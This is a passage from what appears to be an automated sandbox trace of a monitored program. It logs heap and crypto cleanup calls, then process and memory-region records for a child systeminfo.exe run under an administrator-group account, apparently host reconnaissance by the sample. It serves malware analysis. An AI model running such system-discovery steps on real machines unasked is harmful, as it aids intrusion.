[0126.365] GetProcessHeap () returned 0x500000 [0126.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x25ea040 | out: hHeap=0x500000) returned 1 [0126.365] GetProcessHeap () returned 0x500000 [0126.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23f7e50 | out: hHeap=0x500000) returned 1 [0126.365] GetProcessHeap () returned 0x500000 [0126.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x54a6c0 | out: hHeap=0x500000) returned 1 [0126.365] GetProcessHeap () returned 0x500000 [0126.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2427670 | out: hHeap=0x500000) returned 1 [0126.365] GetProcessHeap () returned 0x500000 [0126.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x574d60 | out: hHeap=0x500000) returned 1 [0126.365] GetProcessHeap () returned 0x500000 [0126.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x500000) returned 1 [0126.365] GetProcessHeap () returned 0x500000 [0126.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x254a2c0 | out: hHeap=0x500000) returned 1 [0126.365] GetProcessHeap () returned 0x500000 [0126.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2427430 | out: hHeap=0x500000) returned 1 [0126.365] GetProcessHeap () returned 0x500000 [0126.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2427700 | out: hHeap=0x500000) returned 1 [0126.365] GetProcessHeap () returned 0x500000 [0126.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2427400 | out: hHeap=0x500000) returned 1 [0126.365] GetProcessHeap () returned 0x500000 [0126.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2427d90 | out: hHeap=0x500000) returned 1 [0126.365] GetProcessHeap () returned 0x500000 [0126.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2427b50 | out: hHeap=0x500000) returned 1 [0126.365] GetProcessHeap () returned 0x500000 [0126.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x24277c0 | out: hHeap=0x500000) returned 1 [0126.365] GetProcessHeap () returned 0x500000 [0126.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2427760 | out: hHeap=0x500000) returned 1 [0126.365] GetProcessHeap () returned 0x500000 [0126.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x24279a0 | out: hHeap=0x500000) returned 1 [0126.365] GetProcessHeap () returned 0x500000 [0126.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x24278e0 | out: hHeap=0x500000) returned 1 [0126.365] GetProcessHeap () returned 0x500000 [0126.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2427ca0 | out: hHeap=0x500000) returned 1 [0126.365] BCryptDestroySecret (in: hSecret=0x54e220 | out: hSecret=0x54e220) returned 0xc0000008 [0126.366] GetProcessHeap () returned 0x500000 [0126.366] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x54e220 | out: hHeap=0x500000) returned 1 [0126.366] BCryptDestroySecret (in: hSecret=0x2427820 | out: hSecret=0x2427820) returned 0xc0000008 [0126.366] GetProcessHeap () returned 0x500000 [0126.366] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x24273d0 | out: hHeap=0x500000) returned 1 [0126.366] GetProcessHeap () returned 0x500000 [0126.366] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x24d84c0 | out: hHeap=0x500000) returned 1 [0126.366] GetProcessHeap () returned 0x500000 [0126.366] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23f9150 | out: hHeap=0x500000) returned 1 [0126.366] FreeLibrary (hLibModule=0x7ffe97600000) returned 1 [0126.366] FreeLibrary (hLibModule=0x7ffe94490000) returned 1 [0126.366] FreeLibrary (hLibModule=0x7ffe951c0000) returned 1 [0126.366] FreeLibrary (hLibModule=0x7ffe95e70000) returned 1 [0126.366] FreeLibrary (hLibModule=0x7ffe95df0000) returned 1 [0126.366] FreeLibrary (hLibModule=0x7ffe8ac40000) returned 1 [0126.366] FreeLibrary (hLibModule=0x7ffe93d60000) returned 1 [0126.366] FreeLibrary (hLibModule=0x7ffe89ce0000) returned 1 [0126.366] FreeLibrary (hLibModule=0x7ffe92df0000) returned 1 [0126.366] GetProcessHeap () returned 0x500000 [0126.366] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x24b9b80 | out: hHeap=0x500000) returned 1 [0126.366] GetProcessHeap () returned 0x500000 [0126.366] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23f9f60 | out: hHeap=0x500000) returned 1 Process: id = "4" image_name = "systeminfo.exe" filename = "c:\\windows\\system32\\systeminfo.exe" page_root = "0x22ae2000" os_pid = "0x11a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xde0" cmd_line = "systeminfo" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1026 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1027 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1028 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1029 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1030 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1031 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1032 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1033 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1034 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1035 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1036 start_va = 0x7ff60f3b0000 end_va = 0x7ff60f3ccfff monitored = 0 entry_point = 0x7ff60f3bfec0 region_type = mapped_file name = "systeminfo.exe" filename = "\\Windows\\System32\\systeminfo.exe" (normalized: "c:\\windows\\system32\\systeminfo.exe") Region: id = 1037 start_va = 0x7ffe97fe0000 end_va = 0x7ffe981a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1038 start_va = 0x400000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1039 start_va = 0x7ffe954a0000 end_va = 0x7ffe9554cfff monitored = 0 entry_point = 0x7ffe954b81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1040 start_va = 0x7ffe94740000 end_va = 0x7ffe94927fff monitored = 0 entry_point = 0x7ffe9476ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1041 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1042 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1043 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1104 start_va = 0x7ffe97600000 end_va = 0x7ffe976a6fff monitored = 0 entry_point = 0x7ffe976158d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1105 start_va = 0x7ffe97f40000 end_va = 0x7ffe97fdcfff monitored = 0 entry_point = 0x7ffe97f478a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1106 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1107 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1108 start_va = 0x7ffe97590000 end_va = 0x7ffe975eafff monitored = 0 entry_point = 0x7ffe975a38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1109 start_va = 0x7ffe95550000 end_va = 0x7ffe9566bfff monitored = 0 entry_point = 0x7ffe955902b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1110 start_va = 0x7ffe95670000 end_va = 0x7ffe957c5fff monitored = 0 entry_point = 0x7ffe9567a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1111 start_va = 0x7ffe957d0000 end_va = 0x7ffe95955fff monitored = 0 entry_point = 0x7ffe9581ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1112 start_va = 0x7ffe95d20000 end_va = 0x7ffe95de0fff monitored = 0 entry_point = 0x7ffe95d40da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1113 start_va = 0x7ffe95960000 end_va = 0x7ffe95bdcfff monitored = 0 entry_point = 0x7ffe95a34970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1114 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1115 start_va = 0x7ffe950f0000 end_va = 0x7ffe95159fff monitored = 0 entry_point = 0x7ffe95126d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1116 start_va = 0x7ffe95be0000 end_va = 0x7ffe95c4afff monitored = 0 entry_point = 0x7ffe95bf90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1117 start_va = 0x7ffe95df0000 end_va = 0x7ffe95e41fff monitored = 0 entry_point = 0x7ffe95dff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1118 start_va = 0x7ffe8cc50000 end_va = 0x7ffe8cc6afff monitored = 0 entry_point = 0x7ffe8cc51040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1119 start_va = 0x7ffe8dd60000 end_va = 0x7ffe8ddadfff monitored = 0 entry_point = 0x7ffe8dd71ce0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1120 start_va = 0x7ffe8e140000 end_va = 0x7ffe8e149fff monitored = 0 entry_point = 0x7ffe8e141350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1121 start_va = 0x480000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1122 start_va = 0x7ffe94280000 end_va = 0x7ffe942acfff monitored = 0 entry_point = 0x7ffe94299d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1123 start_va = 0x6d0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 1124 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1125 start_va = 0x500000 end_va = 0x538fff monitored = 0 entry_point = 0x5012f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1126 start_va = 0x6d0000 end_va = 0x857fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 1127 start_va = 0x8b0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 1128 start_va = 0x7ffe97c00000 end_va = 0x7ffe97c3afff monitored = 0 entry_point = 0x7ffe97c012f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1129 start_va = 0x8c0000 end_va = 0xa40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 1130 start_va = 0xa50000 end_va = 0x1e4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 1131 start_va = 0x1d0000 end_va = 0x1d3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "systeminfo.exe.mui" filename = "\\Windows\\System32\\en-US\\systeminfo.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\systeminfo.exe.mui") Region: id = 1132 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1133 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1134 start_va = 0x1e50000 end_va = 0x1f92fff monitored = 0 entry_point = 0x1e78210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1135 start_va = 0x1e50000 end_va = 0x1f2cfff monitored = 0 entry_point = 0x1eae0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1136 start_va = 0x7ffe94680000 end_va = 0x7ffe9468efff monitored = 0 entry_point = 0x7ffe94683210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Thread: id = 22 os_tid = 0x1188 Thread: id = 26 os_tid = 0x60c Thread: id = 27 os_tid = 0x868 Process: id = "5" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x4ec90000" os_pid = "0x1228" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x11a8" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1044 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1045 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1046 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1047 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1048 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1049 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1050 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1051 start_va = 0x7ff7bb770000 end_va = 0x7ff7bb780fff monitored = 0 entry_point = 0x7ff7bb7716b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1052 start_va = 0x7ffe97fe0000 end_va = 0x7ffe981a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1053 start_va = 0x90000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1054 start_va = 0x7ffe954a0000 end_va = 0x7ffe9554cfff monitored = 0 entry_point = 0x7ffe954b81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1055 start_va = 0x7ffe94740000 end_va = 0x7ffe94927fff monitored = 0 entry_point = 0x7ffe9476ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1056 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1057 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1058 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1059 start_va = 0x7ffe97f40000 end_va = 0x7ffe97fdcfff monitored = 0 entry_point = 0x7ffe97f478a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1060 start_va = 0x1b0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1061 start_va = 0x4c0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1062 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1063 start_va = 0x7ffe8bec0000 end_va = 0x7ffe8bf18fff monitored = 0 entry_point = 0x7ffe8becfbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1064 start_va = 0x90000 end_va = 0x90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 1065 start_va = 0xb0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 1066 start_va = 0x7ffe95960000 end_va = 0x7ffe95bdcfff monitored = 0 entry_point = 0x7ffe95a34970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1067 start_va = 0x7ffe95550000 end_va = 0x7ffe9566bfff monitored = 0 entry_point = 0x7ffe955902b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1068 start_va = 0x7ffe950f0000 end_va = 0x7ffe95159fff monitored = 0 entry_point = 0x7ffe95126d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1069 start_va = 0x7ffe95670000 end_va = 0x7ffe957c5fff monitored = 0 entry_point = 0x7ffe9567a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1070 start_va = 0x7ffe957d0000 end_va = 0x7ffe95955fff monitored = 0 entry_point = 0x7ffe9581ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1071 start_va = 0xa0000 end_va = 0xa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1072 start_va = 0x7ffe97df0000 end_va = 0x7ffe97f32fff monitored = 0 entry_point = 0x7ffe97e18210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1073 start_va = 0x7ffe97590000 end_va = 0x7ffe975eafff monitored = 0 entry_point = 0x7ffe975a38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1074 start_va = 0x7ffe97c00000 end_va = 0x7ffe97c3afff monitored = 0 entry_point = 0x7ffe97c012f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1075 start_va = 0x7ffe95d20000 end_va = 0x7ffe95de0fff monitored = 0 entry_point = 0x7ffe95d40da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1076 start_va = 0x7ffe92c00000 end_va = 0x7ffe92d85fff monitored = 0 entry_point = 0x7ffe92c4d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1077 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1078 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1079 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1080 start_va = 0x600000 end_va = 0x787fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 1081 start_va = 0x790000 end_va = 0x910fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 1082 start_va = 0x920000 end_va = 0x1d1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 1083 start_va = 0x1d20000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 1084 start_va = 0x4d0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1085 start_va = 0x7ffe95e70000 end_va = 0x7ffe973cefff monitored = 0 entry_point = 0x7ffe95fd11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1086 start_va = 0x7ffe95390000 end_va = 0x7ffe953d2fff monitored = 0 entry_point = 0x7ffe953a4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1087 start_va = 0x7ffe94a80000 end_va = 0x7ffe950c3fff monitored = 0 entry_point = 0x7ffe94c464b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1088 start_va = 0x7ffe97600000 end_va = 0x7ffe976a6fff monitored = 0 entry_point = 0x7ffe976158d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1089 start_va = 0x7ffe95df0000 end_va = 0x7ffe95e41fff monitored = 0 entry_point = 0x7ffe95dff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1090 start_va = 0x7ffe94680000 end_va = 0x7ffe9468efff monitored = 0 entry_point = 0x7ffe94683210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1091 start_va = 0x7ffe949c0000 end_va = 0x7ffe94a74fff monitored = 0 entry_point = 0x7ffe94a022e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1092 start_va = 0x7ffe94600000 end_va = 0x7ffe9464afff monitored = 0 entry_point = 0x7ffe946035f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1093 start_va = 0x7ffe94660000 end_va = 0x7ffe94673fff monitored = 0 entry_point = 0x7ffe946652e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1094 start_va = 0x7ffe92f80000 end_va = 0x7ffe93015fff monitored = 0 entry_point = 0x7ffe92fa5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1095 start_va = 0x1e60000 end_va = 0x200ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 1096 start_va = 0x2010000 end_va = 0x2346fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1097 start_va = 0x2350000 end_va = 0x2569fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 1098 start_va = 0x2570000 end_va = 0x2789fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 1099 start_va = 0x1d20000 end_va = 0x1e2dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 1100 start_va = 0x1e50000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 1101 start_va = 0x2790000 end_va = 0x29a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 1102 start_va = 0x1e60000 end_va = 0x1f6ffff monitored = 1 entry_point = 0x0 region_type = private name 